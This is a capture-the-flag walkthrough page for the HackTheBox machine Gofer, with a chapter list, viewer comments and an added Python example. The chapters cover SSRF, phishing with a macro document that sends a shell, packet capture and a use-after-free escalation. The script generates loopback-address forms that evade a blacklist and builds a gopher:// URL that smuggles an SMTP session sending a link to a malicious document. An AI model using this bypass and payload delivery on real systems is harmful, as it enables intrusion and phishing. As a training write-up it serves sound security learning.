
HackTheBox – Gofer

00:00 – Introduction
01:00 – Start of nmap
03:40 – Running gobuster to discover the proxy.gofer.htb subdomain
05:20 – Enumerating SMB to find a note that gives an email address to send a malicious document to and hints that HTTP methods are filtered
08:45 – Discovering that proxy.gofer.htb responds differently to POST than to GET, then running gobuster with the method set to POST
11:55 – Finding an SSRF in the proxy, then trying other protocols to discover it accepts gopher:// requests
16:40 – Showing we can get around the localhost/127.0.0.1 blacklist by writing the IP address in hex, then showing why gopher requests are useful
21:30 – Sending an SMTP session via gopher to send an email with a link to a malicious file
27:55 – Making an ODT document with a macro that executes on open and sends a shell
34:50 – Shell as jhudson
36:30 – Going over LinPEAS, discovering tcpdump has file capabilities set that let any user capture packets
44:40 – Opening the capture in Wireshark and showing that tbuckley sent his password to the proxy, then SSH as him
46:57 – Executing the notes binary, which looks like a classic use-after-free (UAF) problem, and playing with it blindly
50:30 – Opening the binary in Ghidra to show that deleting the username only calls free() and does not clear the pointer
53:19 – Running the binary in GDB, setting breakpoints, and showing USER and NOTES have different pointers when they are set one after another
56:00 – Showing what happens when you create the user, free the memory, then create the note (both USER and NOTE now point to the same place in memory)
59:38 – Running into an issue, which turns out to be because we placed our shell in /dev/shm, which is mounted nosuid
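The two pieces of the foothold at 11:55 to 21:30 (getting a loopback address past a string blacklist, and smuggling an SMTP session through the SSRF as a gopher:// URL) are modelled in the added example below. This is not code from the video or from IppSec; the blacklist it bypasses is an assumed plain string match (the proxy's real check is not shown on the page), the address parser is a pure-Python model of libc inet_aton(), and every host, port, address and URL in it is a constructed placeholder rather than a value from the box.

```python
# Added example (not from the video or IppSec). Models (1) alternative spellings of
# 127.0.0.1 that slip past a string blacklist but still parse as loopback, and
# (2) a gopher:// URL whose selector is a complete SMTP session. All hosts, ports,
# addresses and URLs are constructed placeholders.
from typing import Optional
from urllib.parse import quote, unquote_to_bytes, urlsplit


def _c_number(part: str) -> int:
    """Parse one address part like C strtoul(s, NULL, 0): 0x = hex, leading 0 = octal, else decimal."""
    if part[:2].lower() == "0x":
        return int(part[2:], 16)
    if len(part) > 1 and part[0] == "0":
        return int(part, 8)
    return int(part, 10)


def inet_aton_int(addr: str) -> Optional[int]:
    """Pure-Python model of inet_aton(): 1 to 4 dot-separated parts, the last part
    filling all remaining bytes ('127.1' and '2130706433' are both 127.0.0.1).
    Returns the 32-bit value, or None where libc would reject the string."""
    parts = addr.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    try:
        vals = [_c_number(p) for p in parts]
    except ValueError:
        return None
    *head, last = vals
    if any(not 0 <= v <= 0xFF for v in head):
        return None
    if not 0 <= last < 1 << (8 * (4 - len(head))):
        return None
    n = 0
    for v in head:
        n = (n << 8) | v
    return (n << (8 * (4 - len(head)))) | last


def is_loopback(addr: str) -> bool:
    """True if the string resolves (per inet_aton rules) into 127.0.0.0/8."""
    n = inet_aton_int(addr)
    return n is not None and (n >> 24) == 127


def naive_blacklist(host: str) -> bool:
    """Assumed string blacklist of the kind the proxy appears to use."""
    return host.lower() in {"localhost", "127.0.0.1"}


def loopback_aliases() -> list:
    """Spellings of 127.0.0.1 that inet_aton() still resolves to loopback."""
    n = 0x7F000001
    return [f"0x{n:08x}", str(n), f"0{n:o}", "127.1", "0x7f.0.0.1", "0177.0.0.1"]


def bypass_host() -> str:
    """First alias the blacklist lets through that the resolver still treats as loopback."""
    for h in loopback_aliases():
        if not naive_blacklist(h) and is_loopback(h):
            return h
    raise RuntimeError("no usable alias: the blacklist is not a plain string match")


def gopher_smtp_url(host, port, mail_from, rcpt_to, subject, body, helo="x") -> str:
    """gopher://host:port/_<selector>: the client drops the one-byte item type ('_')
    and writes the percent-decoded selector to the socket verbatim, so CRLF-separated
    SMTP commands arrive at the mail server as a complete session."""
    lines = [f"HELO {helo}", f"MAIL FROM:<{mail_from}>", f"RCPT TO:<{rcpt_to}>", "DATA",
             f"Subject: {subject}", "", body, ".", "QUIT"]
    selector = "".join(line + "\r\n" for line in lines)
    return f"gopher://{host}:{port}/_{quote(selector, safe='')}"


def gopher_wire_bytes(url: str) -> bytes:
    """Bytes a gopher client sends for URL: percent-decode the selector after the type byte."""
    u = urlsplit(url)
    return unquote_to_bytes(u.path[2:])  # path is '/_<selector>'


if __name__ == "__main__":
    host = bypass_host()  # 0x7f000001 under the assumed blacklist
    url = gopher_smtp_url(host, 25, "attacker@example.com", "victim@example.com",
                          "report", "http://10.10.14.1/report.odt")  # placeholders
    print(url)
    print(gopher_wire_bytes(url).decode())
```

Feed the printed URL to the SSRF parameter; what the mail server sees is the second printout. The decoder is there so the payload can be checked offline before it is sent, since a single missed CRLF encoding silently breaks the SMTP dialogue.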


by IppSec


12 thoughts on “HackTheBox – Gofer”

  • 4:51 I love ffuf for subdomain and vhost enumeration. Very versatile tool I picked up during my journey doing the CPTS material.

    I'm currently 25% through Dante Pro lab and plan to take the exam in about 3 weeks. Excited and nervous.

  • Hey Ipp, what keyboard are you using, if I may ask?

  • Great video! Thanks for taking the time to explain your thought process in detail, learned a lot.

  • On Debian there by default is no sudo installed.

  • This one was done very very well! Outstanding explanations !!

  • For lateral movement I completely skipped the capability on tcpdump and with pspy found a curl command on proxy.gofer.htb with tbuckley username and password in cleartext. I guess this was unintended?

  • Why don't you make a course? That would be great.

  • Common IppSec phrases:

    What's going on, YouTube, this is IppSec, and we're doing X from Hack The Box

    As always we start with nmap so -sC for default scripts, -sV for enumerate version, -oA to output all formats

    This may take some time to run so I've already ran it

    Please subscribe

    Shoot

    I did not have Ipp relations with that woman

    There we go

    Hey, at least I'm not drinking, Brian

    Hope you guys enjoyed the video, take care, and I will see you all next time
